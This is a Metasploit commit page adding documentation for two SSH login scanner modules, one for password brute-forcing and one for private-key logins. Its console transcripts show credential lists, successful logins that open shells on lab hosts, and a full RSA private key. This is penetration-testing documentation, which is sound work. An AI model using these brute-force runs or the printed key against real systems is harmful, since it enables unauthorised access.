Skip to content

Commit 6a6c8c9

Browse files
committed
Land rapid7#7997, Add SSH login and pubkey docs
2 parents e23e65e + af8e649 commit 6a6c8c9

File tree

2 files changed

+340
-0
lines changed

2 files changed

+340
-0
lines changed
Lines changed: 199 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,199 @@
1+
## SSH Service
2+
3+
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
4+
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
5+
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
6+
7+
## Verification Steps
8+
9+
1. Install SSH and start it.
10+
2. Start msfconsole
11+
3. Do: ` use auxiliary/scanner/ssh/ssh_login`
12+
4. Do: `set rhosts`
13+
5. Do: set usernames and passwords via any of the available options
14+
5. Do: `run`
15+
6. You will hopefully see something similar to, followed by a session:
16+
17+
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
18+
19+
## Options
20+
21+
**BLANK_PASSWORD**
22+
23+
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
24+
25+
**PASSWORD**
26+
27+
Password to try for each user.
28+
29+
**PASS_FILE**
30+
31+
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
32+
33+
**RHOSTS**
34+
35+
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
36+
37+
**STOP_ON_SUCCESS**
38+
39+
If a valid login is found on a host, immediately stop attempting additional logins on that host.
40+
41+
**USERNAME**
42+
43+
Username to try for each password.
44+
45+
**USERPASS_FILE**
46+
47+
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
48+
49+
**USER_AS_PASS**
50+
51+
Boolean value on if an additional login attempt should be attempted with the password as the username.
52+
53+
**USER_FILE**
54+
55+
A file containing a username on every line.
56+
57+
**VERBOSE**
58+
59+
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following:
60+
61+
```
62+
[-] SSH - Failed: 'msfadmin:virtual'
63+
```
64+
65+
## Option Combinations
66+
67+
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
68+
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
69+
70+
## Scenarios
71+
72+
Example run against:
73+
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
74+
* Ubuntu 16.04 Server: 192.168.2.137
75+
* Metasploitable: 192.168.2.46
76+
* Metasploitable 2: 192.168.2.35
77+
78+
```
79+
msf > use auxiliary/scanner/ssh/ssh_login
80+
msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
81+
[*] exec: cat /root/ssh_passwords.lst
82+
83+
msfadmin
84+
badpassword
85+
root
86+
ubuntu
87+
88+
msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
89+
pass_file => /root/ssh_passwords.lst
90+
msf auxiliary(ssh_login) > cat /root/ssh_un.lst
91+
[*] exec: cat /root/ssh_un.lst
92+
93+
msfadmin
94+
badpassword
95+
root
96+
ubuntu
97+
98+
msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
99+
user_file => /root/ssh_un.lst
100+
msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
101+
[*] exec: cat /root/ssh_hosts.lst
102+
103+
192.168.2.156
104+
192.168.2.137
105+
192.168.2.35
106+
192.168.2.46
107+
msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
108+
rhosts => file://root/ssh_hosts.lst
109+
msf auxiliary(ssh_login) > set verbose false
110+
verbose => false
111+
msf auxiliary(ssh_login) > set threads 4
112+
threads => 4
113+
msf auxiliary(ssh_login) > exploit
114+
115+
[*] SSH - Starting bruteforce
116+
[*] SSH - Starting bruteforce
117+
[*] SSH - Starting bruteforce
118+
[*] SSH - Starting bruteforce
119+
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
120+
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
121+
[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
122+
[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
123+
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
124+
[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
125+
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
126+
[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
127+
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
128+
[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
129+
[*] Scanned 3 of 4 hosts (75% complete)
130+
[*] Scanned 4 of 4 hosts (100% complete)
131+
[*] Auxiliary module execution completed
132+
msf auxiliary(ssh_login) > sessions -l
133+
134+
Active sessions
135+
===============
136+
137+
Id Type Information Connection
138+
-- ---- ----------- ----------
139+
5 shell /linux SSH msfadmin:msfadmin (192.168.2.46:22) 192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
140+
6 shell /linux SSH msfadmin:msfadmin (192.168.2.35:22) 192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
141+
7 shell /linux SSH root:ubuntu (192.168.2.156:22) 192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
142+
8 shell /linux SSH ubuntu:ubuntu (192.168.2.156:22) 192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
143+
9 shell /linux SSH ubuntu:ubuntu (192.168.2.137:22) 192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
144+
```
145+
146+
Example run against:
147+
* Windows 10 w/ Linux Subsystem
148+
149+
```
150+
msf > use auxiliary/scanner/ssh/ssh_login
151+
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
152+
rhosts => 192.168.2.140
153+
msf auxiliary(ssh_login) > set username winuser
154+
username => winuser
155+
msf auxiliary(ssh_login) > set password "badpassword"
156+
password => badpassword
157+
msf auxiliary(ssh_login) > exploit
158+
159+
[*] SSH - Starting bruteforce
160+
[+] SSH - Success: 'winuser:badpassword' ''
161+
[!] No active DB -- Credential data will not be saved!
162+
[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
163+
[*] Scanned 1 of 1 hosts (100% complete)
164+
[*] Auxiliary module execution completed
165+
msf auxiliary(ssh_login) > sessions -l
166+
167+
Active sessions
168+
===============
169+
170+
Id Type Information Connection
171+
-- ---- ----------- ----------
172+
1 shell / SSH winuser:badpassword (192.168.2.140:22) 192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
173+
174+
```
175+
176+
Example run against:
177+
* Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
178+
179+
It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
180+
This should be enough info to manually exploit via a regular SSH command.
181+
182+
```
183+
msf > use auxiliary/scanner/ssh/ssh_login
184+
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
185+
rhosts => 192.168.2.140
186+
msf auxiliary(ssh_login) > set username virtual
187+
username => virtual
188+
msf auxiliary(ssh_login) > set password virtual
189+
password => virtual
190+
msf auxiliary(ssh_login) > exploit
191+
192+
[*] SSH - Starting bruteforce
193+
[+] SSH - Success: 'virtual:virtual' 'id: Command not found. help ?: Command not found. '
194+
[!] No active DB -- Credential data will not be saved!
195+
[*] 192.168.2.140 - Command shell session 4 closed. Reason: Died from EOFError
196+
[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
197+
[*] Scanned 1 of 1 hosts (100% complete)
198+
[*] Auxiliary module execution completed
199+
```
Lines changed: 141 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,141 @@
1+
## SSH Service
2+
3+
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
4+
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
5+
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
6+
7+
### Key Generation
8+
9+
On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
10+
After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
11+
12+
## Verification Steps
13+
14+
1. Install SSH and start it.
15+
2. Create an SSH keypair and add the public key to the `authorized_keys` file
16+
3. Start msfconsole
17+
4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
18+
5. Do: `set rhosts`
19+
6. Do: set usernames with one of the available options
20+
7. Do: `set KEY_PATH ` to either a file or path
21+
7. Do: `run`
22+
8. You will hopefully see something similar to the following:
23+
24+
```
25+
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
26+
```
27+
28+
## Options
29+
30+
**KEY_PATH**
31+
32+
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
33+
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
34+
35+
**RHOSTS**
36+
37+
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
38+
39+
**STOP_ON_SUCCESS**
40+
41+
If a valid login is found on a host, immediately stop attempting additional logins on that host.
42+
43+
**USERNAME**
44+
45+
Username to try for each password.
46+
47+
**USER_FILE**
48+
49+
A file containing a username on every line.
50+
51+
**VERBOSE**
52+
53+
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
54+
55+
## Option Combinations
56+
57+
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
58+
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
59+
60+
## Scenarios
61+
62+
Example run with a FOLDER set for `KEY_PATH` against:
63+
* Ubuntu 14.04 Server
64+
65+
While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
66+
67+
```
68+
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
69+
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
70+
rhosts => 192.168.2.156
71+
msf auxiliary(ssh_login_pubkey) > set username ubuntu
72+
username => ubuntu
73+
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
74+
key_path => /root/sshkeys/
75+
msf auxiliary(ssh_login_pubkey) > run
76+
77+
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
78+
[*] SSH - Testing 2 keys from /root/sshkeys
79+
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
80+
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
81+
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
82+
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
83+
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
84+
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
85+
aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
86+
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
87+
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
88+
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
89+
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
90+
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
91+
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
92+
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
93+
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
94+
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
95+
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
96+
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
97+
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
98+
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
99+
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
100+
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
101+
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
102+
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
103+
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
104+
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
105+
-----END RSA PRIVATE KEY-----
106+
107+
'
108+
[!] No active DB -- Credential data will not be saved!
109+
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
110+
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
111+
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
112+
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
113+
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
114+
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
115+
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
116+
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
117+
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
118+
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
119+
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
120+
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
121+
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
122+
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
123+
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
124+
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
125+
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
126+
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
127+
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
128+
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
129+
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
130+
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
131+
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
132+
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
133+
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
134+
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
135+
-----END RSA PRIVATE KEY-----
136+
137+
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
138+
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
139+
[*] Scanned 1 of 1 hosts (100% complete)
140+
[*] Auxiliary module execution completed
141+
```

0 commit comments

Comments
 (0)